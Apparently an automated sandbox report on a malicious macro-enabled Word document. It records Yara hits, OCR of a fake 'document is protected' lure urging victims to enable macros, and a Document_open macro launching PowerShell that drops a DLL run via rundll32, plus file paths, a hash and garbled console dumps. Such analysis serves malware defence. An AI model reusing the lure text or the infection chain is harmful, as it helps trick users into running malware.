Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.4c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Word
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I , Words: 4,072 , US I N@m 1
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G)
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G) A GE)
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5777
Source: unknown	Process created: Commandline size = 5676
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5676	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Gyuopigcwtoen\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017D7D	6_2_10017D7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100189F6	6_2_100189F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10007605	6_2_10007605
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000620A	6_2_1000620A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001F411	6_2_1001F411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000F813	6_2_1000F813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000D013	6_2_1000D013
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10008816	6_2_10008816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000421E	6_2_1000421E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001C424	6_2_1001C424
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002628	6_2_10002628
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004A2B	6_2_10004A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000DC2F	6_2_1000DC2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10018831	6_2_10018831
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10007E34	6_2_10007E34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A83A	6_2_1000A83A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000903F	6_2_1000903F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014E4B	6_2_10014E4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000704B	6_2_1000704B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000D44C	6_2_1000D44C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001C04C	6_2_1001C04C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005856	6_2_10005856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10001658	6_2_10001658
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011259	6_2_10011259
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10018668	6_2_10018668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C07D	6_2_1000C07D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10014693	6_2_10014693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CAA0	6_2_1001CAA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004EA1	6_2_10004EA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10008CA3	6_2_10008CA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001C6AD	6_2_1001C6AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100056B3	6_2_100056B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10015AB8	6_2_10015AB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005EB9	6_2_10005EB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100106C2	6_2_100106C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009CC8	6_2_10009CC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D2CB	6_2_1001D2CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000D0DE	6_2_1000D0DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10009AE1	6_2_10009AE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100142E2	6_2_100142E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DEE8	6_2_1001DEE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100094EC	6_2_100094EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000C6EF	6_2_1000C6EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000CF11	6_2_1000CF11
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10015115	6_2_10015115
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001231B	6_2_1001231B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001BF25	6_2_1001BF25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DB25	6_2_1001DB25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000492A	6_2_1000492A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001D530	6_2_1001D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000213E	6_2_1000213E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000CB42	6_2_1000CB42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10016B45	6_2_10016B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001654F	6_2_1001654F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10003D4E	6_2_10003D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10018F65	6_2_10018F65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10012965	6_2_10012965
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001676B	6_2_1001676B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10010F6D	6_2_10010F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10011B71	6_2_10011B71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10017570	6_2_10017570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000A176	6_2_1000A176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DD78	6_2_1001DD78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10013D7C	6_2_10013D7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001E19F	6_2_1001E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100199A4	6_2_100199A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10015DAA	6_2_10015DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001EDB9	6_2_1001EDB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10006BC0	6_2_10006BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100173C0	6_2_100173C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100177C0	6_2_100177C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10019DC0	6_2_10019DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100193C9	6_2_100193C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001CDCC	6_2_1001CDCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1000ADCE	6_2_1000ADCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B1D2	6_2_1001B1D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10004BDE	6_2_10004BDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10005BE1	6_2_10005BE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10002DEE	6_2_10002DEE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100137F4	6_2_100137F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001B3FE	6_2_1001B3FE

Source: Io8ic2291n.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module Bcur5699z4d, Function Document_open			Name: Document_open

Source: Io8ic2291n.doc

OLE indicator, VBA macros: true

Source: Io8ic2291n.doc

OLE indicator application name: unknown

Source: Joe Sandbox View

Dropped File: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00

Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@32/14@6/99

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$8ic2291n.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCAFC.tmp

Jump to behavior

Source: Io8ic2291n.doc

OLE indicator, Word Document stream: true

Source: Io8ic2291n.doc	OLE document summary: title field not present or empty
Source: Io8ic2291n.doc	OLE document summary: author field not present or empty
Source: Io8ic2291n.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .........................#.....H.#.............#...............................h.......5kU.......#.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................4...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........#.....L.................#.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........X.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................K..j......................O.............}..v.....~......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................K..j..... O...............O.............}..v.....~......0.z...............X.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......B...............O.............}..v....h.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.=........................j......X...............O.............}..v............0.z.............h.X.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j......................O.............}..v....(.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j..... O...............O.............}..v............0.z...............X.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j.....KX...............O.............}..v............0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............+..j....p.................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j.....KX...............O.............}..v............0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............+..j....p.................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j.....KX...............O.............}..v............0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............+..j....p.................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.z..............HX.....(.......4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............+..j......................O.............}..v....@.......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.8.4.............}..v....P.......0.z..............HX.....$.......4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P#......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j.....$................O.............}..v.....$......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P+......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j.....,................O.............}..v.....,......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P3......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j.....4................O.............}..v.....4......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P;......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j.....<................O.............}..v.....<......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....KX...............O.............}..v....PC......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............+..j.....D................O.............}..v.....D......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....KX...............O.............}..v....PK......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............+..j.....L................O.............}..v.....L......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....KX...............O.............}..v....PS......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............+..j.....T................O.............}..v.....T......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....KX...............O.............}..v....P[......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............+..j.....\................O.............}..v.....\......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....KX...............O.............}..v....Pc......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............+..j.....d................O.............}..v.....d......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....KX...............O.............}..v....Pk......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............+..j.....l................O.............}..v.....l......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....KX...............O.............}..v....Ps......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............+..j.....t................O.............}..v.....t......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....KX...............O.............}..v....P{......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............+..j.....\|................O.............}..v.....\|......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v....P.......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
